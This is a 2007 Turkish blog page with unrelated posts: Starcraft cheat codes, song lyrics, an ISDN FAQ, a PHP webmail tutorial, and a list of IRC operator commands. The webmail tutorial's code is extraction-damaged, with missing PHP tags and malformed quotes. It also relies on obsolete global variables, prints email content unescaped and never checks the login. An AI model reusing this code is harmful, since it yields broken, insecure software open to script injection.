Starcraft Brood War Oyun Hileleri

Etiketler: Gönderen blogger on 16 Temmuz 2007 Pazartesi zaman: 16:14

Starcraft Brood War

Zerg�lerin gizli görevi:
Gizli bölümü açmak için, Zerg�lerin 9. bölümünü 20 dakikadan önce bitirmeniz lazım. Ama gizli bölümün başında SAVE etmeyi unutmayın, çünkü oyuna tekrar başladığınızda gizli görevi menüden seçemiyorsunuz.

Hileler:
Oyun sırasında ENTER�a basıp, aşağıdaki hileleri girin ve tekrar ENTER�a basın.

MAN OVER GAME Bölümü kazama.
GAME OVER MAN Bölümü kaybetme.
SOMETHING FOR NOTHING Bütün Upgrade�leri tamamlama.
MEDIEVAL MAN Upgrade�ler bedavaya yapılır.
OPERATION CWAL Binalar ve upgrade�ler anında yapılır.
THE GATHERING Sonsuz psionic enerji
POWER OVERWHELMING Binalar ve gemiler yokedilmez olur (düşmanları da etkiler)
WAR AINT WHAT IT USED TO BE Savaş sisini kaldırır.
FOOD FOR THOUGHT Supply Limit gerekmez olur.
BLACK SHEEP WALL Tüm gözükür harita.
NOGLUES Düşmanın tüm psionic enerjisi biter.
MODIFY THE PHASE VARIANCE Herhangi bir binayı yapabilirsiniz.
SHOW ME THE MONEY Mineral ve gaz 10.000 artar.
WHATS MINE IS MINE Mineral miktarı 500 artar.
BREATHE DEEP Gaz 500 artar.
THERE IS NO COW LEVEL Görev atlama.
STAYING ALIVE Bölüm bittikten sonra devam edebilirsiniz.
RADIO FREE ZERG Zerg�lerin farklı bir müziği (sadece zerg�lerle oynarken işler).

109 yorum  

Sezen Aksu - Sarşınım

Etiketler: Gönderen blogger on zaman: 16:12

Bir eda bir çalım aldın başını gittin
Ne kadar mahsun bir şeyi terkettin
Avunurken olur olmaz aşklarla
Seni hem sevdim hem senden nefret ettim

Ne sen unuttun ne ben unuttum
Aldatma kendini gel
Yanıyor içim eriyor içim
Eskisinden de beter

Gel gel sarışınım gel
Gel sane alışığım gel
Gel gel gün ışığım gel
Gel çok karışığım gel

Bir ateş ki alev alev yanar içimde
Saçının kokusu kaldı ellerimde
Yatağımda deli gibi döner dururum
Dolaşır sanki hayalin hala tenimde

0 yorum  

ISDN ile ilgili Sıkça Sorulan Sorular

Etiketler: , Gönderen blogger on zaman: 15:58

1) ISDN Nedir ?

Integrated Services Digital Network (Tümleşik Hizmetler Sayısal Şebekesi) sözcüklerinin başharflerinden oluşan ISDN; ses, görüntü, veri gibi her türlü bilginin sayısal bir ortamda birleştirilip aynı hat üzerinden iletilmesinin sağlandığı bir haberleşme ağıdır. İletim kalitesi normal telefon hattından daha yüksektir. ISDN hata oranı düşük, güvenli ve sınırsız bir haberleşme sağlar.

2) Euro-ISDN nedir?

Avrupa Topluluğu ülkelerinin kurduğu ve Türkiye'nin de üye olduğu Avrupa Telekomünikasyon Standartları Enstitüsü (ETSI), üye ülkelerin ortak kullanımı için standartları Euro-ISDN adıyla belirlemiştir. Euro-ISDN Avrupa'daki birçok iletişim uygulaması için evrensel ve standart bir çözüm haline gelmiştir. Bu standartlara göre hizmet veren ISDN de Euro-ISDN olarak isimlendirilmektedir.

3) ISDN abonesi olmanın avantajları nelerdir?

Eğer işyerinizde veya evinizde bilgisayarınız, faksınız, telefonunuz varsa ve bunların hepsini aynı hat üzerinden kullanmak istiyorsanız ISDN abonesi olmanız gerekmektedir. Ayrıca ISDN sayesinde görüntülü telefon, arayan numarayı görme, görüşmenizin süresini ve kontör sayısını öğrenme, video konferans (aynı anda en az 3 kişiyle) ve benzeri özelliklerden yararlanabilir, internete hızlı bir şekilde bağlanabilirsiniz.

4) ISDN abonesi olabilmek için başvurular nereye, nasıl yapılır?

İlgili Telekom Müdürlüğüne başvurularak abonelik formu doldurulur.

5) ISDN hattına kaç terminal cihazı bağlanabilir? Aynı anda kaç cihazı kullanabilirim?

ISDN hattına 8 adet terminal cihazı bağlanabilir ancak aynı anda ikisi kullanılabilir. Görüntülü telefon olursa tek olarak kullanılır.

6) ISDN için özel bir kablo kullanılması gerekiyor mu ?

ISDN BA için standart telefonlar için kullanılan bakır hatlar kullanılır. ISDN PRA genellikle fiber optik kablo üzerinden sağlanır.

7) ISDN abonesi olunduğunda mevcut telefon hattının iptal edilmesi gerekecek mi ?

ISDN kullanıcıları normal telefon hatlarına ihtiyaç duyuyorlarsa iptal ettirmelerine gerek yoktur. ISDN ve normal telefonlarını isterlerse farklı iki hattan kullanabilir ya da iptal ettirebilirler.

8) ISDN abonesi olunduğunda ek olarak başka bir cihaz alınması gerekiyor mu?

Evet. Eğer ISDN hattına ISDN uyumlu terminaller (telefon makinası, faks, bilgisayar v.b.) bağlayacaksanız yalnızca NT (Network Terminatörü) arabirim cihazı almanız yeterlidir. Eğer klasik terminalleri kullanacaksanız ayrıca bir de TA (Terminal Adaptörü) almanız gerekmektedir. NT cihazının Euro ISDN uyumlu olması gerekir.

9) Aboneler ISDN terminal ve ilave cihazları nereden temin edecekler?

ISDN kullanıcıları ISDN Terminal, NT, TA vb. cihazları Türk Telekom onaylı olmak şartı ile piyasadan temin edeceklerdir.

10) Kullanılan normal telefon makinası ISDN abonesi olunduğunda ISDN hatlarında da kullanılabilir mi?

Evet, ama piyasadan bir TA (Terminal Adaptörü) ve NT (Network Terminatörü) almanız gerekmektedir. Terminal Adaptörü sayesinde, ISDN terminali olmayan cihazların ISDN'e uyumu sağlanır.

11) ISDN üzerinden video konferans yapılabilir mi?

Santral tipine göre değişmekle birlikte, genellikle aynı anda 3 ilâ 6 kişinin video konferans yapması mümkündür.

12) ISDN ücretlendirilmesi nasıldır?

ISDN hizmetinde bağlantı ücreti, aylık ücret normal telefon kontör atış periyoduna göre haberleşme ücreti alınır. Veri iletişiminde ise tarifesine göre ücret alınır.

13) ISDN abonesi olunduğunda 822'li hatlarda bir değişiklik olacak mı?

ISDN hattı ile 822 'li hatların doğrudan bir ilişkisi bulunmamaktadır. Internete 822 dialup ile erişmede, kullanılan modemlerden dolayı hız sınırlaması mevcuttur. Ancak ISDN'de bu hız problemi ortadan kalktığı ve kaliteli servis alındığı için ISDN'e geçiş tavsiye edilmektedir.

14) ISDN'de hangi standart ve bant kullanılacaktır?

ISDN standardı Euro-ISDN'dir. İlk etapta Darband ISDN (2Mbps) hizmeti verilecektir.

15) Kullanıcılar ISDN şebekesine nasıl erişir?

ISDN hizmeti PA ve BA olmak üzere iki şekilde sunulmaktadır.

a) ISDN BA (Basic Access-Temel Erişim): Her biri 64 Kbps'lik 2 adet B (bilgi) kanalı ve 16 Kbps'lik bir adet D (işaretleşme) kanalı içermektedir.

b) ISDN PA (Primary Access-Çoklu Erişim): Her biri 64 Kbps'lik 30 adet B kanalı ve 64 Kbps'lik bir adet D kanalı içermektedir.

16) Sizin için ISDN BA’mı yoksa ISDN PA aboneliği mi uygun olur?

Dosya transferi, LAN bağlantıları, görüntü haberleşmesi, PC haberleşmesi, Internet servis sağlayıcıları ve büyük şirketler için ISDN PA aboneliği; daha küçük şirketler ve ev aboneleri için ISDN BA aboneliği uygundur.

17) ISDN hızları ne olacaktır?

ISDN BA : 2 x 64 Kbps = 128 Kbps

ISDN PA : 30 x 64 Kbps = 2 Mbps

18) PSTN modemlerinde kullanılan hızla ISDN hızı arasında fark var mıdır?

Normal telefon hattında V.34 modemleri kullanıldığında hız 28.8 Kbps olur. Ama aynı hattı ISDN olarak kullandığınızda hızınız 4 kat (128 Kbps) artar. 14.4 Kbps (V.32 bis) modem ile kıyasladığınızda hızınız yaklaşık 10 kat artmış olur.

19) ISDN kanalları nasıl ve hangi amaç için kullanılacaktır?

ISDN BA ve ISDN PA servisine baktığımızda B kanalları data veya ses için; D kanalı işaretleşme veya X.25 paket şebekesi için kullanılır. (Örneğin, D kanalları telemetri sinyalleri gibi hızı 100 bps olan datalar için kullanılabilir. USS gibi servislerde kısa mesaj veya düşük hızlı veri iletimi için D kanal kullanılabilir.)

ISDN PA'da 30 B ve 1 D kanalı vardır. Hızı 2 Mbps'dir. Aslında temeli E1 arabirimine dayanır. Japon standardına göre 24 kanal ve 1.54 Mbps yani T1 ile aynı ortamda çalışır. Genelde büyük firmaların PBX'i ile kendi santralımız arasındaki bağlantılarda kullanılır.

20) Görüntülü telefon hizmeti almak için ISDN BA mı, yoksa ISDN PA abonesi mi olmak gerekir?

Görüntülü telefon için ISDN BA (128 Kbit/s) yeterlidir. B kanalının birinden ses, diğerinden görüntü gider. ISDN PA (2Mbit/s) ise çok büyük bir band olduğundan sadece görüntülü telefon için ekonomik değildir.

21) ISDN hattında hangi interface (arabirim) kullanılacaktır?

Türk Telekom santrallarından binanızın girişine kadar olan hat U Interface; binanızın içinden cihazınıza kadar olan hat ise S/T interface olacaktır. ISDN ek cihazlarını alırken S/T uyumlu olanları almanız gereklidir.

22) Bilgisayarların ISDN uyumlu olması için nasıl bir modem (adaptör) alınması gerekir?

Bilgisayarlarda biri iç diğeri dış olmak üzere iki türlü modem vardır.

Bilgisayar çıkışında, 125 Kbps hızında, RS-232 seri portu bulunmaktadır. ISDN hızı 128 Kbps olduğu için dış modem kullanıldığında bilgisayar ile dış modem arasında 3 Kbps fark meydana gelecek bu da görüntü ve kaliteyi olumsuz olarak etkileyecektir. İç modem kullanıldığı zaman bu farklılık ortadan kalkacağı için iç modem kullanılması önerilmektedir.

Bilgisayar windows 95 ve en az 486 CPU olmalıdır.

23) Network Terminatörü (NT-Şebeke sonlandırcı) nedir?

Tüm ISDN terminallerinin tek bir ISDN hattına bağlantısını sağlayan bir arabirim cihazıdır.

24) Bir ülkeden alınan ISDN terminali diğer bir ülkede çalışır mı?

Ülkeler telefonda farklı özellikler tanımlayabilirler. Amerikan ve Japon sistemlerinde sinyalin analogdan dijitale çevrilmesinde m -law, diğer ülkelerde ise A-law şifreleme kullanır. Eğer satın alınan cihazda bu iki özelliği çeviren bir anahtar yoksa büyük problemler doğabilir. Amerika'da ISDN cihazları genelde iç modem kullanmakta olup, ISDN hattına bağlandığı zaman U noktasına bağlanır. Türk Telekom hizmetinde ise modem ve NT1 gerekli olup, S/T noktasına bağlanmaktadır. Eğer abone Amerika'dan böyle bir cihaz alırsa ülkemizde çalışmayabilir ya da uyumsuzluk olabilir.

25) Genişband (Broadband ISDN) nedir?

ISDN PRI'dan daha büyük band kullanan ISDN servislere Genişband ISDN denir. Başka bir deyişle hızı 2 Mbit/s'den (2 Mbit/s hariç) başlayıp 1 Gb/s'e kadar olan ISDN servislerdir. Broadband ISDN denince akla özellikle bir teknoloji gelmez, sadece ATM gelir. ATM teknolojisi ISDN genişband'ta anahtarlama alt yapısı olarak kullanılır. Başka bir deyişle bir köprü düşünülürse bir bacağı darband ISDN, diğer bacağı ATM (Genişband ISDN)'dir.

26) ATM nedir ?

ATM (Asynchronous Transfer Mode) bir anahtarlama veya transmisyon tekniğidir. Uzunluğu 53 byte olan küçük ve sabit hücrelerden (5 byte başlık, 48 byte Data) oluşan bir pakettir. Genişband ISDN'in çekirdeğini oluşturur. Ses, data ve resmin aynı ortamdan iletilmesini sağlar. Şu anda TTNET2 projesinde backbone olarak ATM teknolojisi kullanılmıştır.

27) ISDN internet servisinde "Backbone" olarak kullanılır mı, kullanılırsa ne ölçüde çözüm getirir ?

Evet ISDN, internet erişimde bir backbone olarak kullanılır. (Ancak ISDN çok uzun süreli bir çözüm değildir.)

28) ISDN'nin şu anda yerini alabilecek bir servis var mıdır ?

Evet. Bilindiği üzere ISDN kullanıcılara genişband imkanı sağlamaktadır. ISDN evde veya ofiste bakır kablonun sağladığı band genişliğini 128 kbit/s'e çıkarmaktadır. Aynı işi yapan ADSL ve türevleri (XDSL, VDSL) vardır. ADSL sistemlerle de bant imkanını artırmak mümkündür. Aynı zamanda TTNET2 projesi de ADSL sistemlerle uyuşum sağlamaktadır.

29) ISDN'de hangi protokoller kullanılır?

Data ve ses kanalı olan B kanalları için LAPB; işaretleşme kanalı olan D kanalı için LAPD protokolü kullanılır.

30) ISDN PRI hangi illerimizde verilmektedir.

Ankara - İstanbul - İzmir - Adana - Antalya - Bursa - Kayseri - Konya -Mersin - Gaziantep - İzmit - Trabzon - Malatya - Samsun illerimizdeki bazı santrallarda verilmekte olup, diğer illerimize yaygınlaştırma çalışmaları devam etmektedir.

31) ISDN BRI ( BA) hangi illerimizde verilmektedir ?

ISDN BA ( 2x64 Kbit/s) ticari olarak Ankara, İzmir illerimizde bazı santrallarda verilmektedir. Hizmetin yaygınlaştırılması için çalışmalar sürdürülmekte olup, bu paralelde 27.072 adet ISDN BA siparişi verilmiştir.

ISDN BA siparişlerini iller ve santral alanları bazında görmek için tıklayınız.

32) ISDN abonesi olabilmek için başvurlar nereye yapılacaktır?

İlgili Telekom Müdürlüğüne müracaat ederek, abonelik başvuru formu doldurulacaktır.

33) Uzak mesafeli adresler için ISDN aboneliği gerçekleşebilir mi?

Evet. Bu üç şekilde yapılmaktadır:

a) Remote atarak (şu anda uygulanmaktadır.)

b) Santrallarda kullanılan V 5.1 Protokolünün V 5.2 Protokolüne çevrilmesiyle (bunun için software yatırım gerekmektedir.)

c) DMUX 12 Sistemi kullanılarak yapılmaktadır.

34) ISDN aboneliğinde numaralama planı nasıl olacaktır?

PSTN'de kullanılan E.164 numaralama planının aynısı kullanılacaktır.

E.164 numaralama planı:

Normal telefonlarda CC (Country Code) 1-3 digit arası, TC (Trunk Code) maksimum 1-3 digit SN (Subscriber Code) 7 digit olmak üzere toplam 12 digittir. ISDN'de ise CC 1-3 digit NDC (National Destination Number) maksimum 15 digit'tir. Ayrıca kullanılırsa Sub-address maksimum 40 digit'tir.

Üniteler normal telefon numarası bloklarından belli bir blok ISDN için ayıracaklardır. Numaralama planı yapılırken MSN, DDI vb. ek servisler talep edilsin edilmesin verilecekmiş gibi bir planlama yapılacaktır.

35) ISDN Abonesi olmakla ne gibi kullanım kolaylıklarından yararlanılabilir?

Ücretli ve ücretsiz olmak üzere iki türlü kullanım kolaylığı vardır.

ÖZEL KULLANIM KOLAYLIKLARI

Ücretli Servisler:

MSN-Çoklu Abone Numarası:

ISDN hattına bağlanacak her bir cihaz için (en fazla 8 terminal) ayrı numaraya sahip olma veya tek bir terminal cihazı için birden fazla numara kullanabilme özelliğidir. (ISDN BA Aboneliğinde kullanılır.)

DDI- Doğrudan Arama: Arayanların Prefix + dahili abone numarası çevirerek doğrudan dahili aboneye ulaşabilmesi özelliğidir. (ISDN PA Aboneliğinde kullanılır)

Sub Adressing-Alt adresleme: Abonenin, terminal cihazları için logical adres tanımlayabilme özelliğidir.Telefon numarasından sonra tanımlanacak olan rakamlarla, hatta bağlı olan cihazlara tek bir ISDN numarası için birden fazla adres tanıtılacaktır. User to user signalling- UUS: Kısa mesaj veya ölçekli veri iletiminin D işaretleşme kanalı kullanılarak gerçekleştirilmesi özelliğidir.

AOC- Ücret Tesbiti: Aramayla ilgili ücret bilgileri veya kontör sayısının, çağrı kurulma sırasında, çağrı süresince veya çağrı sonunda görülebilmesi özelliğidir.

CUG-Kapalı Kullanıcı Grubu: Belirli bir veya birden fazla grup kullanıcısının birbirleri ile özel sanal bir şebeke üzerinden haberleşebilme özelliğidir.

CLIP- Arayanı Görme: Arayan abonenin numarasının görülmesi özelliğidir. Aranan abonenin alacağı bir özelliktir.

CLIR- Arayanın görünmemesi: Arayan abone numarasının karşı tarafta görülmesinin engellenebilmesi özelliğidir

CLIR Override- Arayan abonenin CLIR özelliğinin bastırılması özelliğidir.

COLP- Bağlanılanı Görme: Bağlantı kurulan terminalin numarasının görülebilmesi özelliğidir. Özellikle, aranılan tarafın cihaz ( faks vb.) olması gibi, gönderilen bilginin doğru yere gidip gitmediğinin onayının alınamadığı durumlarda kullanılabilir.

COLR-Bağlanılanın Görülmemesi: Aranılan abonenin numara bilgisinin, arayan tarafa gitmesinin engellenmesi özelliğidir.

UUS-Çağrı kurulmadan, çağrı kurulduğu sırada ve kurulduktan sonra olmak üzere üç çeşittir.

Ücretsiz Servisler:

Bu servislerin kullanımı halinde PSTN Özel Kullanım kolaylıklarında olduğu gibi ücretlendirme yapılır.

Call Hold- Çağrı Tutma: Abonenin, konuştuğu aboneyi bekletmeye alarak başka bir çağrı yapabilmesi özelliğidir.

Call Barring: Çıkan Arama Kısıtlaması: Abonenin cihazını tüm çıkan aramalara veya belirli aramalara kapatıp açabileceği özelliktir.

Call Waiting- Bekleyen Çağrı: Abonenin meşgul durumda iken, kendisine gelen çağrıdan bir ikaz tonu ile haberdar edilmesi özelliğidir. Abone ya mevcut konuşmayı beklemeye alarak yeni arayan ile bağlantı kurar ya da çağrılardan birini tercih ederek diğerini sonlandırır.

Call Forward- B / U / NR – Çağrı Yönlendirme: Gelen çağrıların daha önceden belirlenmiş numaralara yönlendirilmesi özelliğidir. Çağrı yönlendirme üç değişik şekilde yapılabilir:

Abone Meşgul – B : Gelen çağrılar, abone meşgul ise yönlendirilir.

Bütün Çağrılar- U: Gelen bütün çağrılar yönlendirilir.

Cevap Yok- NR: Gelen çağrılar, önceden belirlenmiş sayıda zil tonu çaldıktan sonra cevap verilmediği takdirde yönlendirme yapılır.

Konferans Görüşme: İkiden çok abonenin birbirleri ile görüşebilmeleri özelliğidir.

Terminal Portability- Terminal Taşınırlığı: Abonenin, terminal cihazını, iletişim (bağlantı) devam ettiği sırada, park edip, aynı erişime bağlı başka bir sokete takıp konuşmasına veya haberleşmesine kaldığı yerden davam edebilmesi özelliğidir.

Call Transfer- Çağrı Transferi: Aboneye gelen bir çağrının bir başka aboneye aktarılması özelliğidir

MCID- Kötü Amaçlı Çağrıları Yakalama: Rahatsız edici çağrıların santraldan tesbiti özelliğidir

CCBS- Meşgulde Tekrar Arama: Aranılan numaranın meşgul olması durumunda, meşguliyeti bittiğinde otomatik olarak aramanın gerçekleşmesi özelliğidir.

Line Hunting- Hat Yakalama: Giren aramaların önceden belirlenmiş düzene göre dağıtılma özelliğidir.

CD Call Deflection- Çağrının başka bir terminal cihazına çağrı kurulmadan önce (aranan abone telefonunu açmadan önce) yönlendirilmesi özelliğidir.

0 yorum  

Gelin beraber basit bir webmail yazalım.

Etiketler: , , , Gönderen blogger on zaman: 15:54

Web tabanlı e-mail sistemleri son yıllarda oldukça popüler olmuştur. Webmail sistemler bir Internet Cafe' den veya arkadaşınızın bilgisayarından posta kutunuza erişim sağlamak için güvenli, zahmetsiz ve hızlı bir çözümdür. Bu yazımızda aynen Hotmail gibi ama tabii ki çok daha basit, ilkel bir webmail programının nasıl hazırlanabileceğini, daha sonra hangi adımları takip etmemiz gerektiğini inceleyeceğiz.

Bir webmail programı en azından 5 bileşenden oluşur.

* Kullanıcının gerçekten kim olduğunu anlamamıza yarayan kullanıcı adı ve şifrenin alındığı ve onaylandığı bölüm. Buradan alınan şifre ve kullanıcı adı normal şartlarda kullanıcının pop3 veya imap şifresi olmalıdır.
* e-mailların IMAP veya POP3 sunucudan alınması.
* Posta kutusu(folder) yönetimi. Kullanıcının e-maillarını hazırda varolan dizinlerde saklayabilmesi veya yeni dizinler yaratabilmesi, modifiye edebilmesi.
* Yeni e-mail yaratma ve gönderme modülü.
* Attachment(Eklenti) yönetimi.

Bir webmail programının temel işlevini yerine getirmesi için en basitinden e-mailları sunucudan çekip, gösterebilmesi ve yeni mail atabilmesi yeterlidir. Bu yazımızda da güvenlik, eklentiler, dizin vb... ayrıntılara girmeden mesajlarımızı sunucu üzerinden okuyabilmemiz için gerekli bir arayüz hazırlamak temel amacımızdır.
PHP' nin hazırlanması gerekli modüllerin kontrol edilmesi.

PHP ile birlikte bir sunucudaki imap veya pop3 sunucuya bağlanıp üzerinde işlem yapabilmek için hazır fonksiyonlar gelmektedir. PHP manualinde IMAP functions başlığı altındaki fonksiyonları kullanmak için PHP' nin --with-imap desteği ile derlenmiş olması gereklidir. Değişik durumlara göre gereksinimler şöyle özetlenebilir.

* Kaynak koddan derleyen kişiler : ilk olarak c-client paketini indirip kurmalıdırlar. Kurulum biraz zahmetlidir. Ayrıntılı kurulum bilgilerine paketle birlikte gelen dokümanlardan ulaşabilirsiniz. Doğru kurulum yapılmadığı takdirde PHP, --with-imap parametresi ile derlenmede sorun çıkaracaktır.
* Red Hat tabanlı Linux kullanıcıları : sadece php-imap paketini kurarak ve php.ini dosyalarında "extension=imap.so" yazan yerin başındaki ; (noktalı virgül) ü kaldırarak kurulumu tamamalayabilirler.
* Debian GNU/Linux kullanıcıları : "apt-get install php-imap" komutunu vererek gerekli işlemleri tamamlayabilirler.
* Windows kullanıcıları : makinelerinde php_imap.dll dosyasının olduğundan emin olduktan sonra php.ini dosyasında ";extension=php_imap.dll" yazan satırın başındaki ; (noktalı virgül) işaretin kaldırarak kurulumu tamamlarlar. Bu dosya mevcut değilse netten bulabilirsiniz.

PHP' ye IMAP fonksiyonlarının yüklü olup olmadığını bir php scriptine sadece aşağıdaki kodu yazarak test edebilirsiniz.

phpinfo();
?>

Bu php scriptinin çıktısında imap yazan tabloyu arayınız. Tablo mevcutsa kurulum tamamlanmıştır.
Kullanıcının login olması ve gerekli bilgilerinin alınması

Bu iş için hazırladığımız script kullanıcıdan username ve password bilgisini alacaktır. Ardından girilen bilgiler doğru mu kontrol edilecek, doğru ise sunucu üzerindeki mailları listelenmek üzere INBOX' a yönlendiriliecektir. Kullanıcı bilgilerini almak için PHP authentication kullanıyoruz.
login.php dosyası

error_reporting(32);
if (!$PHP_AUTH_USER) {
Header("WWW-authenticate: basic realm="MAIL KONTROL"");
Header("HTTP/1.0 401 Unauthorized");
} else {
Header("Location:inbox.php");
}
?>

Yukarıdaki basit scriptte kullanıcıdan gerekli bilgileri alıp inbox.php scriptine yani sunucudaki mailların listelendiği scripte yönlendirme yapıyoruz.

webmail programı kimi kullanıcıların sandığının aksine hiç bir şekilde ana sunucudaki mailları başka bir makineye çekmez. inbox listelendiği vakit dahi, sadece ana makinedeki mailların başlık bilgileri istenir ve bunlar çoğu zaman bir array' de bekletilir veya direk print out olarak ekrana yazdırılır. Biz ilk olarak headers adlı bir arrayde mesaj başlıklarını toplayıp ardından ekrana yazdıracağız.
inbox.php

error_reporting(32);
$SUNUCU = "{operamail.com/pop3}";
$link= imap_open($SUNUCU, $PHP_AUTH_USER, $PHP_AUTH_PW);
$headers = imap_headers($link);
echo "

INBOX


";
echo "Posta kutunuzda " . count($headers) . " mesaj var.

";

for ($x = 1; $x <= count($headers) ; $x++) {
$idx = ($x -1);
echo "$headers[$idx]
";
}
?>

inbox.php scripti ilk olarak sunucuya bir pop3 bağlantısı yaratır. Dikkat ettiyseniz pop3 bağlatısı diyorum ama pop3 olarak bağlanıyorum. PHP, imap ve pop3 arasındaki benzerliklere dikkat çekerek ikisini birbirinden ayırmamıştır. yukarıdaki kodun $SUNUCU = ... yazan kısmındaki pop3' ü imap olarak değiştirirseniz sunucudaki 110 nolu pop3 portu yerine 143 nolu imap portundan iletişim sağlarsınız hepsi bu kadar. IMAP ile pop3 arasındaki asıl farklılık dizin yönetiminde karşımıza çıkacaktır ki bu konu yazımızın amacını oldukça aşar.

imap_headers() fonksiyonu açık olan pop3 bağlantısından girilmiş olan kullanıcı adı ve şifreye ait kullanıcının mesajlarının başlıklarını otomatik olarak alan bir fonksiyondur. Çıktısı bir arraydir ve biz de bu array' i headers adlı değişkene atıyoruz. Ardından da bir for döngüsü içerisinde arrayin içeriğini teker teker ekrana yazdırıyor ve mesajoku.php' ye bir link yaratıyoruz.

Kullanıcı inbox.php' den bir mesaja tıkladığında artık o mesajı okumak istediğini belirtmiştir. Bizim yapmamız gereken bu mesajın artık tamamını sunucudan çekerek kullanıcıya okuması amaçlı sunmaktır. En temel bilgiler olan header(başlık) bilgileri yani Subject, From, To, Date gibi bilgileri de yine PHP' nin bize sunduğu olanaklardan faydalanarak elde edeceğiz. Olanak derken, PHP' nin imap_header() fonksiyonundan bahsediyoruz.
mesajoku.php

error_reporting(32);
$SUNUCU = "{operamail.com/pop3}";
$link = imap_open($SUNUCU, $PHP_AUTH_USER, $PHP_AUTH_PW);
$header = imap_header($link,$num);

echo "Kimden : " . $header->fromaddress . "
";
echo "Kime : " . $header->toaddress . "
";
echo "Tarih : " . $header->Date . "
";
echo "Baslik : " . $header->Subject . "



"; echo nl2br(imap_body($link,$num)); echo "

INBOX"; ?>

Yukarıdaki kısa script gerçekten de sunucudan e-mailın çekilmesi, başlık bilgilerinin gösterilmesi ve mesajın okunması için yeterli işlevi yerine getirebilmektedir. Yine ilk satırlarda gerekli pop3 bağlantısını yaratıyoruz ve ardından da imap_header fonksiyonu yardımıyla mesajın başlık bilgilerini $header adlı bir array içerisine atıyoruz. hangi mesajın sunucudan çekileceğini ise $num adlı değişkenden elde ediyoruz. Bu değişken inbox.php' den bize bir URL referans değişkeni olarak gönderilmişti.

echo ile bağlayan satırlar kendi kendisini açıklar derecede basit ve anlaşılırdır. Burada dikkat çekilmesi gereken nokta ise imap_body fonksiyonudur. Bu fonksiyon mesajın başlık bilgisinin haricinde mesajın body kısmını oluşturan metni geri döndürür ve çıktısı string' dir. Bunu hiç bir değişkene atamadan direk ekrana yazdırarak webmail programımızın en temel işlevlerini tamamlamış oluyoruz.

Yukarıdaki kodları bir araya koyarak bir yazılım ortaya çıkardığınızda ve gündelik hayatınızda kullanmaya başladığınızda bazen garip karakterlerle dolu ve okunması pek mümkün görünmeyen mesajlar alacaksınız. Bu tür mesajlar MIME mesajlardır ve okunması için ekstra işlemlerden geçirilmesi gereklidir. Eğer kendiniz test etmek istiyorsanız sunucu makinedeki hesabınıza bir attachmentlı e-mail gönderin ve attachment' ın nasıl göründüğüne bir bakın. Bu tür mailların okunması işlemi yukarıda yazılanlardan çok daha kompleks işlemlerdir.

Yazılımı geliştirmek isteyen kullanıcılar, ilk olarak MIME hakkında ayrıntılı bigiye sahip olmalı, ardından PHP' nin imap fonksiyonlarını manual' dan incelemelidir. IMAP ve pop3' ün standartları hakkında bilgi sahibi olduktan sonra imap üzeirnde folder kavramlarına yönelmelidirler. Son olarak da MIME mesaj göndermeyi tamamladığınızda Hotmail benzeri bir yazılım üretmemeniz için hiç bir sebep yoktur.

Yazılımı üretirken Postaci Webmail, BasiliX gibi Türk üretimi webmail paketlerin kodlarının incelenmesini öneriyorum.

0 yorum  

iRCop Komutları

Etiketler: , , , Gönderen blogger on zaman: 15:53

iRCop KOMUTLARI:

| Lokal Baglanti: Iki tane server i birbirine baglar

| Lokal = Demek sizin linklenecek serverlerden birinde olmaniz demek

| Komut: /CONNECT


| Uzaktan Baglanti: Gene iki tane server i birbirine baglar.

| Uzaktan = Siz linklenecek serverlerin hich birinde bulunmassiniz

| Komut: /CONNECT


| Server Cikisi: Kurulu Olan Bir Link`i koparir

| Komut: /SQUIT


| Kill: Belirtilen Kullaniciyi Bir Sefer olmak uzere serverden koparir

| Komut: /KILL


| Wallops: +w Olan kullanicilara bir msg gonderilir ama gonderme ichin IRCop

| Olmak gerekir

| Komut: /WALLOPS


| Rehash: Irc.Conf`u Yeniden yukler (Sadece Ircd.Conf`da degisiklik yapilinca).

| Komut: /REHASH


| Restart: Server`i Restartlar

| Komut: /RESTART


| Die: Server`i Kapatir.

| KOmut: /DIE


| Akill: Belirtilen Tum Serverlerden Otomatik killer.

| Komut: /AKILL


| Rakill: Yapilmis olan bir akill i kaldirir.

| Komut: /RAKILL


| Kline: Lokal Server ban`i ekler.

| Komut: /KLINE veya


| Unkline: Yapilmis Bir K-Line`i Kaldirir.

| KOmut: /UNKLINE


| Globops: +g Flagi olan tum operlara bir msg gonderir

| Komut: /GLOBOPS : NOTE:':' Yazmak Mecburidir.


| Locops: +g flagi Olan tum Lokal IRCop lara bir msg gonderir.

| Komut: /LOCOPS


| Chatops: +b Flagli tum ircopara Bir Msg gonderir

| Komut: /CHATOPS : NOTE:':' yazmak mecburidir.


| Adchat: Tum Server Adminlerine Msg gonderir (+A).

| Komut: /ADCHAT : NOTE:':' Yazmak mecburidir


| Trace: Server veya kullanici hakkinda bilgi verir

| Komut: /TRACE veya /TRACE


| Server notes: Oper`larin Server`e gonderilmis msg lari okumasini saglar.

| Syntax: /SNOTES <#>


| Server note: Server`e Operlarin Okumasi Ichin Bir Msg yazar.

| Komut: /SNOTE


| Addline: Bu Komut yazacaginiz satiri aynen Ircd.Conf`un ichine ekleyecektir.

| Fakat bu komutut sadece Server Adminleri Kullanabilir <+A>

| Komut: /ADDLINE


| Gline: Tum network uzerinde User@Host`a Bir ban koyar.

| Komut: /GLINE


| Rem Gline: Yapilmis Bir G-Line`i Kaldirir.

| Komut: /REMGLINE


| Zline: Verilen IP`ye Bir ban ekler.

| Komut: /ZLINE


| Hostname: Sizin Hostname`inizi Ne isterseniz o yapar.

| Komut: /HOSTNAME |


| Kullanici Modlari


| o = Global IRCop

| O = Local IRCop

| i = Gorunmez (Who Aramasinda Gozukmez)

| w = Wallop Msglarini Gosterir

| g = Globop Ve Local Op Msg`i Yazabilir Ve Gonderebilir.

| h = Yardimci Oper

| s = Server Noticen Leri Dinler

| k = Kill`leri Gormenizi Saglar.

| S = Sadece Services Ichin (Onlari Korur)

| a = Services Admin Gosterir

| A = Server Admin Gosterir

| N = Network Admin Gosterir

| T = Technical Admin Gosterir

| C = Yardimci Admin Gosterir

| c = Server e giren cikan herkezi gosterir

| f = Flood Alarmlarini Gosterir

| r = Nickinizin Registerli Oldugunu Gosterir

| x = Hostname inizi Saklar

| e = +e Kullanicilarina Gonderilen Msglari Gorur

| b = Chatops lari okuyabilirsiniz.



Kanal Modlari

| p = Ozel Kanal

| s = Gizli Kanal

| i = Sadece Davet Edilebilir

| m = Sadece Op`lar Ve Voiceler Konusabilir

| n = Kanal Disindan Msg Gonderilmesini Engeller

| t = Sadece Op`lar Topigi Degistirebilir

| r = Kanalin Registered oldugunu gosterir

| R = Kanal`a sadece Nick`i Regli olanlar girebilir

